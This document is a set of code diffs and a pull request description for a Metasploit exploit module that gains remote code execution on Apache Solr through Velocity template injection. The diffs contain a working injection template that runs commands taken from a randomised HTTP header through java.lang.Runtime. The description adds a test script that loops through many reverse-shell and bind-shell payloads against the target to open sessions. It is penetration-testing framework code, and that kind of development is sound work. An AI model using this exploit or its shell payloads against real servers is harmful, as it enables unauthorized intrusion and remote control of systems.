     # the next 2 lines cause problems with CmdStager, so it's only used when needed
     # during the check for PowerShell existence, or by specific payloads
@@ -452,6 +529,7 @@ class MetasploitModule < Msf::Exploit::Remote
     raw_result = solr_get(
       'uri' => normalize_uri(target_uri.path, opts['core_name'].to_s, 'select'),
       'auth' => opts['auth_string'],
+      'headers' => { 'X-MSF' => cmd },
       'vars_get' =>  {
         'q'                 => '1',
         'wt'                => 'velocity',
@@ -486,7 +564,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'method'        => 'GET',
       'connection'    => 'Keep-Alive',
       'uri'           => opts['uri']
-    }
+    }.merge(opts)
 
     # @auth_string defaults to "" if no authentication is necessary
     # otherwise, authentication is required

--- a/modules/exploits/multi/http/solr_velocity_rce.rb
+++ b/modules/exploits/multi/http/solr_velocity_rce.rb
@@ -475,12 +475,12 @@ class MetasploitModule < Msf::Exploit::Remote
       }
     )
 
-    # for printing command output
-    unless raw_result.nil?
-      unless raw_result.code == 200
-        pp raw_result.headers
-        fail_with Failure::PayloadFailed, "Payload failed to execute!"
-      end
+    # This will give you a Java stack trace from the remote side to help with
+    # debugging payload templates.
+    if raw_result&.code != 200
+      #pp raw_result.headers
+      vprint_error raw_result.body
+      fail_with Failure::PayloadFailed, "Payload failed to execute!"
     end
   end
 

--- a/modules/exploits/multi/http/solr_velocity_rce.rb
+++ b/modules/exploits/multi/http/solr_velocity_rce.rb
@@ -432,14 +432,6 @@ class MetasploitModule < Msf::Exploit::Remote
   def execute_java(opts = {})
 
     template =
-=begin
-    %q{
-      #set($b=$request.getHttpSolrCall().req.getHeader("X-A00"))
-      #set($c=$b.getClass().getClass())
-      #set($d=$c.forName("java.util.Base64").getMethod("getDecoder",null).invoke(null, null))
-      $d.decode($b)
-    }
-=end
     %q{
       #set($_="")
       #set($c=$_.getClass().getClass())
@@ -494,9 +486,10 @@ class MetasploitModule < Msf::Exploit::Remote
 
   # sic 'em, bois!
   def execute_command(cmd, opts = {})
+    header_name = "X-" + Rex::Text.rand_text_alpha_upper(8)
     # custom template which enables command execution
     template = %q{
-      #set($c=$request.getHttpSolrCall().req.getHeader("X-MSF"))
+      #set($c=$request.getHttpSolrCall().req.getHeader("}+header_name+%q{"))
       #set($x="")
       #set($rt=$x.class.forName("java.lang.Runtime"))
       #set($chr=$x.class.forName("java.lang.Character"))
@@ -521,7 +514,7 @@ class MetasploitModule < Msf::Exploit::Remote
     raw_result = solr_get(
       'uri' => normalize_uri(target_uri.path, opts['core_name'].to_s, 'select'),
       'auth' => opts['auth_string'],
-      'headers' => { 'X-MSF' => cmd },
+      'headers' => { header_name => cmd },
       'vars_get' =>  {
         'q'                 => '1',
         'wt'                => 'velocity',


### PR DESCRIPTION
This adds a Java target. Also fixes quoting issues with several payloads by putting the command in a parameter instead of directly in the template.

## Verification

- Install Solr 5.3.0 and 8.3.0
- `use exploit/multi/http/solr_velocity_rce`
### Java
- `set TARGET 0`
- `exploit`
  - *Verify*: java meterpreter session
### Unix commands
- `set TARGET 1`
- `set payload cmd/unix/generic`
- `set command id`
- `exploit` 
  - *Verify*: output is returned

I used this rc script to test payloads. Note that if you installed Solr with docker, you'll have to setup ports in docker for the bind payloads to work. The commented payloads are those I haven't tested because I didn't have the victim environment handy for them.
```
sessions -K
<ruby>
payloads = [
  'cmd/unix/reverse',
  'cmd/unix/reverse_awk',
  'cmd/unix/reverse_bash',
  #'cmd/unix/reverse_bash_telnet_ssl',
  'cmd/unix/reverse_bash_udp',
  #'cmd/unix/reverse_jjs',
  #'cmd/unix/reverse_ksh',
  #'cmd/unix/reverse_lua',
  #'cmd/unix/reverse_ncat_ssl',
  'cmd/unix/reverse_netcat',
  #'cmd/unix/reverse_netcat_gaping',
  #'cmd/unix/reverse_nodejs',
  'cmd/unix/reverse_openssl',
  'cmd/unix/reverse_perl',
  'cmd/unix/reverse_perl_ssl',
  #'cmd/unix/reverse_php_ssl',
  'cmd/unix/reverse_python',
  'cmd/unix/reverse_python_ssl',
  #'cmd/unix/reverse_r',
  #'cmd/unix/reverse_ruby',
  #'cmd/unix/reverse_ruby_ssl',
  'cmd/unix/reverse_socat_udp',
  'cmd/unix/reverse_ssh',
  #'cmd/unix/reverse_ssl_double_telnet',
  #'cmd/unix/reverse_stub',
  #'cmd/unix/reverse_tclsh',
  #'cmd/unix/reverse_zsh',
  'cmd/unix/bind_awk',
  'cmd/unix/bind_netcat',
  'cmd/unix/bind_perl',
]
$stderr.puts("Running #{payloads.count} payloads")
lport = 4444
payloads.each do |pay|
  run_single("set payload #{pay}")
  run_single("set lport #{lport}")
  run_single("exploit -z")
  lport += 1
end
framework.sessions.each { |id,s| s.info = nil }
run_single("sessions")
$stderr.puts("Finished running #{payloads.count} payloads")
$stderr.puts("Created #{framework.sessions.count} sessions")
</ruby>
```

### Windows
I didn't test Windows. Hopefully everything there still works.


